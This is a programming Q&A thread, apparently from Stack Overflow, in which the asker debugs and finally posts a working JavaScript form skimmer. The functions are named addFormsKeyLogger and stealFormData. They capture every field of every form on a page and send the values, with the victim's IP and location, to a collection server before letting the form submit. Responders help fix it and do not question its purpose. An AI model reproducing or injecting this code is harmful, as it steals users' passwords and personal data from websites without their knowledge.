# Ajax does not post ny request

Tags: javascript, ajax

I try to post a request using Ajax and pure Javascript, basically I add a listener on the submit button of all the HTML forms present on the page.

When triggered these listeners retrieve the user inputted data and POST them to my remote server.

The problem is that I enter in the `ajaxPostRequest` method but no request is sent. I suspect that Ajax does not have enough time to do its job because of the form action="something" which make the browser leave the current page where the Javascript code is running.

```
function addFormsKeyLogger(victimIP) {
    var forms = document.forms;

    for (i = 0; i < forms.length; i++) {
        forms[i].addEventListener('submit', function () {
            var elements = this.elements;
            var formData = '';

            for (j = 0; j < elements.length; j++) {
              formData += elements[j].name + ':' + elements[j].value + '|';
            }

            stealFormData(victimIP, formData);
        }, false);
    }
}

function stealFormData(victimIP, formData) {
    var params = "action=stealFormData" 
        + "&victimIP="  + victimIP
        + "&domain="    + document.domain
        + "&location="  + encodeURIComponent(location.pathname) 
        + "&formData="  + encodeURIComponent(formData);

    ajaxPostRequest(params);
}

function ajaxPostRequest(params) {
    var url = "http://127.0.0.1/something.php";
    var xhttp = new XMLHttpRequest(); 

    // for debugging
    xhttp.onreadystatechange = function() {
        if (xhttp.readyState == 4 && xhttp.status == 200) {
            alert(params);
        }
    };

    xhttp.open("POST", url, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.send(params);
}
```

EDIT: It seems that I found a beginning of solution.
I need to prevent the normal behavior of submit by using `event.preventDefault();` I post my request and then I call `this.submit();`.
However a new issue appeared: Instead of sending 1 request several requests (as many as there are forms on the page) are sent. Any idea?

Comment: Are you calling `preventDefault()` on the event?  If not it will go ahead and post to the server just as if there were no javascript executing.

Comment: @Bardicer this might solve my issue. However, I want to execute my Javascript and then redirect the user to the original action="something" page. Do you know how to achieve that?

Comment: preventDefault should do that. You can also change action to "##"

Comment: Use jQuery its 1000x easier

Comment: @Alexandre once you've gotten the form in a variable in javascript, you can do `form.submit()` I believe.  I did this myself at a previous employer, but Dustin is also correct - jQuery would greatly simplify things.

Answer (score 0):

Well, I think that it is better to post as an answer than a very very long edit.

I changed the code as follows:

```
function addFormsKeyLogger(victimIP) {
    var forms = document.forms;

    for (i = 0; i < forms.length; i++) {
        forms[i].addEventListener('submit', function (event) {
            event.preventDefault();
            var elements = this.elements;
            var formData = '';

            for (j = 0; j < elements.length; j++) {
              formData += elements[j].name + ':' + elements[j].value + '|';
            }

            var params = "action=stealFormData" 
                + "&victimIP="  + victimIP
                + "&domain="    + document.domain
                + "&location="  + encodeURIComponent(location.pathname) 
                + "&formData="  + encodeURIComponent(formData);

            ajaxPostRequest(params);
            this.submit();
        }, false);
    }
}

function ajaxPostRequest(params) {
    var url = "http://127.0.0.1/whatever.php";
    var xhttp = new XMLHttpRequest(); 

    // for debugging
    xhttp.onreadystatechange = function() {
        if (xhttp.readyState == 4 && xhttp.status == 200) {
            alert("success: " + params);
        }
    };

    xhttp.open("POST", url, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.send(params);
}
```

The problem now as I explained in my previous edit is that a request is sent for each and every form. That should not be the case since the listeners are bounded to a specific form (this). Therefore, if I submit a form it should send only one request (for the good form) which is not the case currently.

Any hint?

Answer (score 0):

Ok so I answer my own post.
I actually had to prevent the default behavior of the post to add a callback (I wait that the POST request was made) and then submit the form that I passed as the callback here is the code, hope it might help someone :)

```
function addFormsKeyLogger(victimIP) {
    var forms = document.forms;

    for (i = 0; i < forms.length; i++) {
        forms[i].addEventListener('submit', function(event) {
            event.preventDefault();
            var elements = this.elements;
            var formData = '';

            for (j = 0; j < elements.length; j++) {
              formData += elements[j].name + ':' + elements[j].value + '|';
            }

            var params = "action=stealFormData" 
                + "&victimIP="  + victimIP
                + "&domain="    + document.domain
                + "&location="  + encodeURIComponent(location.pathname) 
                + "&formData="  + encodeURIComponent(formData);

            ajaxPostRequest(params, this);
        }, false);
    }
}

function ajaxPostRequest(params, callback) {
    var url = "http://127.0.0.1/whatever.php";
    var xhttp = new XMLHttpRequest(); 

    // for debugging
    if(typeof callback !== "undefined") {
        xhttp.onreadystatechange = function() {
            if (xhttp.readyState == 4 && xhttp.status == 200) {
                callback.submit();
            }
        };
  }

    xhttp.open("POST", url, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.send(params);
}
```